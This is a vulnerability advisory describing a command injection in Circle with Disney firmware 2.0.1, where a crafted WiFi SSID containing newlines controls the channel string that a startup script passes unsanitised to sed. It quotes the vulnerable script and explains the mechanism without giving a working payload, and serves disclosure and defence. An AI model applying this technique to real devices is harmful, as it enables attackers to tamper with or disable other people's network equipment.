### Summary
An exploitable vulnerability exists in the WiFi Channel parsing of Circle with Disney running firmware 2.0.1. A specially crafted SSID can cause the device to execute arbitrary sed commands. An attacker needs to setup an access point reachable by the device to trigger this vulnerability.
### Tested Versions
Circle with Disney 2.0.1
### Product URLs
https://meetcircle.com/
### CVSSv3 Score
7.4 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
### CWE
CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
### Details
Circle with Disney is a network device used to monitor internet use of children on a given network.
At the end of the boot process, the script "/mnt/shares/usr/bin/startcircle" is executed. The script configures NTP, network interfaces, firewall rules and starts cronjobs.
Part of the script configures an Access Point, which is actually useful only for the initial configuration of the device.
```
...
# [1]
$DIR/scripts/aplist_create.sh
# [2]
best_ch=`awk 'BEGIN{max=-1000;} /Channel:/{ch=$4} /Signal/{s=$2+0; if (s>max){ max=s; maxch=ch}} END{print maxch}' /tmp/
ap_list.out`
[ "x$best_ch" != "x" ] && {
echo $best_ch > /tmp/current_channel
# [3]
sed -i "s/channel=.*/channel=$best_ch/g" /tmp/hostapd.conf
}
...
```
At [1] the script calls `aplist_create.sh`, which has the following contents:
```
#!/bin/sh
ifconfig ra0 up
iwinfo ra0 scan > /tmp/ap_list.out # [4]
`iwinfo` [4] prints a list of Access Points detected by `ra0`, every entry has the following form:
Cell 01 - Address: 11:22:33:44:55:66
ESSID: "valid-ssid"
Mode: Master Channel: 1
Signal: -22 dBm Quality: 70/70
Encryption: WPA2 PSK (CCMP)
```
After creating "ap_list.out" at [1], the initial script will select the channel that has the best signal. The channel is extracted as a string, using `awk` with its default field separators [2].
Finally at [3] the channel is used in a `sed` substitution command, without any sanitization.
An SSID field in an 802.11 frame has a maximum length of 32 bytes and can contain any character. Moreover, `iwinfo` will print the characters found in the SSID without escaping. This means that an attacker may use an SSID containing new-line characters to add arbitrary lines to the `iwinfo` output.
This allows an attacker to control the channel string returned by awk, which gets passed to sed at [3].
### Timeline
* 2017-09-20 - Vendor Disclosure
* 2017-10-31 - Public Release
暂无评论